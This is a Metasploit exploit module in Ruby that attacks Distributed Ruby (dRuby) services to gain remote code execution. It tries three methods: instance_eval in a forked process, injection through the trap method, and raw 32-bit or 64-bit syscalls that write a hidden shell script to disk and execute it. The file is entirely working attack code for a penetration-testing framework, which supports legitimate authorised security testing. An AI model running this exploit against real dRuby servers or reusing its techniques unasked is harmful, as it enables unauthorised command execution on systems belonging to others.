##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'drb/drb'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Distributed Ruby Remote Code Execution',
      'Description'    => %q{
        This module exploits remote code execution vulnerabilities in dRuby.
      },
      'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], #(Phenoelit)
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
          [ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],
          [ 'URL', 'http://bugkraut.de/posts/tainting' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 32768,
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [
        ['Automatic', {}],
      ],
      'DisclosureDate' => 'Mar 23 2011',
      'DefaultTarget' => 0))


      register_options(
        [
          OptString.new('URI',
            "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)"),
          Opt::RHOST(nil, false),
          Opt::RPORT(8787)
        ])
  end

  def method_trap(p)
    p.send(:trap, 23,
      :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
    p.send(:my_eval, payload.encoded)
  end

  def method_instance_eval(p)
    p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
  end

  def method_syscall(p)
    filename = "." + Rex::Text.rand_text_alphanumeric(16)

    begin
      # syscall to decide wether it's 64 or 32 bit:
      # it's getpid on 32bit which will succeed, and writev on 64bit
      # which will fail due to missing args
      j = p.send(:syscall, 20)
      # syscall open
      i =  p.send(:syscall, 8, filename, 0700)
      # syscall write
      p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
      # syscall close
      p.send(:syscall, 6, i)
      # syscall fork
      p.send(:syscall, 2)
      # syscall execve
      p.send(:syscall, 11, filename, 0, 0)

    # likely 64bit system
    rescue Errno::EBADF
      # syscall creat
      i = p.send(:syscall,85,filename,0700)
      # syscall write
      p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
      # syscall close
      p.send(:syscall,3,i)
      # syscall fork
      p.send(:syscall,57)
      # syscall execve
      p.send(:syscall,59,filename,0,0)
    end

    register_file_for_cleanup(filename) if filename
    #print_status("payload executed from file #{filename}") unless filename.nil?
    #print_status("make sure to remove that file") unless filename.nil?
  end

  def exploit
    unless datastore['URI'].blank?
      serveruri = datastore['URI']
    else
      serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
    end

    DRb.start_service
    p = DRbObject.new_with_uri(serveruri)
    class << p
      undef :send
    end

    methods = ["instance_eval", "syscall", "trap"]
    methods.each do |method|
      begin
        print_status("trying to exploit #{method}")
        send("method_" + method, p)
        handler(nil)
        break
      rescue SecurityError => e
        print_error("target is not vulnerable to #{method}")
      end
    end

  end
end